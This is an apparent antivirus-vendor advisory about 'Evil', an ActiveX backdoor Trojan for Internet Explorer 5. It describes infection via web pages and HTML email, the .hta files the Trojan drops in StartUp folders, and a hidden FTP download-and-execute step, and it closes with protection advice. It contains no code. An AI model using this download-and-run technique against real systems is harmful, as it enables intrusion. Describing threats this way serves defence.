      Evil, First Trojan Programmed in ActiveX

           Evil, the first backdoor Trojan programmed in ActiveX, has just been 
      discovered. Thanks to the Internet-based technology it uses, this new 
      threat opens up a whole new field in the development of malicious code 
      that act through the Internet.
      How does this Trojan attack?
      Infection can be produced simply by visiting a web page that features the 
      Trojan. As soon as the page is downloaded, the ActiveX application is 
      executed, thereby leading to the installation of the Trojan on your 
system.
      Another attack route is through e-mail, as the latest versions of e-mail 
      clients support HTML pages. In other words, the code can be activated by 
      opening a message written in HTML. What's even worse, if you have the 
      AutoPreview option enabled on your e-mail reader, infection can be 
      produced simply by receiving the mail message containing the HTML page 
      carrying the malignant ActiveX application.
      What effects are produced by this backdoor Trojan?
      What Evil does to a victim computer is to execute a previously assigned 
      program. This program may be automatically downloaded from the Internet by 
      the Trojan itself, without the user ever realizing what is going on.
      The effects depend on the 'load' assigned to the Trojan. For example, 
      through Evil it is possible to install an Internet Trojan that enables a 
      malicious user to remotely administer the victim computer, which means 
      that he will have total control over that machine. It would also be 
      possible to execute viruses as damaging as CIH or worms with such enormous 
      propagation potential as Melissa.
      According to Panda's Worldwide Disinfection Center, 'personalizing the 
      Trojan and assigning it an enormously dangerous load is as easy as 
      changing a line of code.' The programs that are executed on the victim 
      computer are downloaded from the Internet, which means that the computer 
      is left open to attack by any kind of malignant code. In the sample sent 
      to the Panda Worldwide Disinfection Center, the Trojan tried to download a 
      file named trojan.exe from the FTP server of a well-known web site that 
      offers free web hosting. This 'trojan.exe' file could easily be replaced 
      with a logic bomb, virus, worm or Trojan.
      In short, the potential effects of this threat are as varied as malignant 
      code and viruses themselves, and may even be used as a means of transport 
      for new threats yet to be developed.
      How does it act?
      The virus is made up of malicious ActiveX code that, when added to an HTML 
      page, creates a file in the Windows (English version) StartUp directory: 
      'C:\windows\Start Menu\Programs\StartUp\windows95.hta', 
      in the case of Windows 95/98. 
      In the case of Windows NT systems it creates 
      'C:\WINNT\Profiles\Default User\Start Menu 
      \Programs\Startup\windowsNT.hta'. 
      This file contains a series of commands that are executed when the 
      computer is restarted. 
      Evil's code modifies Windows registries, with the goal of enabling the 
      file and printer sharing option. However, the string entered is too long 
      and, thus, the system cannot execute the effect.
      But, the effect that is successfully carried out in the system opens a 
      concealed FTP session, in order to download the program assigned from the 
      Internet, without the user even being aware of such transfer. Once the 
      file has been saved on the victim's computer, the Trojan executes it.
      This malicious ActiveX control works under Internet Explorer 5 in Windows 
      95,98 and NT systems.
      How users can protect their computers?
      The best way to combat this threat is to be protected with a reliable and 
      up-to-date antivirus, since Evil requires 
      that you avail of double protection: first, our antivirus must be able to 
      detect malignant ActiveX applications and protect us against these 
      menaces. Secondly, because of the possible modifications in the virus' 
      code that may prevent its detection, it is convenient that the antivirus 
      be prepared to combat the latest threats and malignant codes, and be able 
      to neutralize any malignant program the Trojan attempts to download from 
      the Internet. For example, supposing that the Trojan successfully installs 
      itself on our system, if we are protected with a reliable antivirus, it 
      would be able to detect a virus, such as CIH, being downloaded. This way, 
      we can reduce the possibilities of suffering an attack to zilch.
      Microsoft has offered a patch that installs a system that warns about the 
      execution of ActiveX controls when visiting HTML pages. Although these 
      types of alarms are useful for making users think twice before executing 
      an ActiveX application on their computers, they cannot detect malicious 
      code. Since they are not antivirus programs, they are unable to determine 
      whether the application to be executed is benign or malignant. In any 
      case, this type of alarm permits users to take the risk of deciding 
      whether or not to execute an ActiveX application coming from the Internet.
      Lastly, we recommend that you do not visit 'underground' pages (those that 
      deal with matters concerning virus programming, hacking or other illegal 
      activities) or those that provide illegal copies of programs, for they are 
      susceptible to containing material with these types of threats.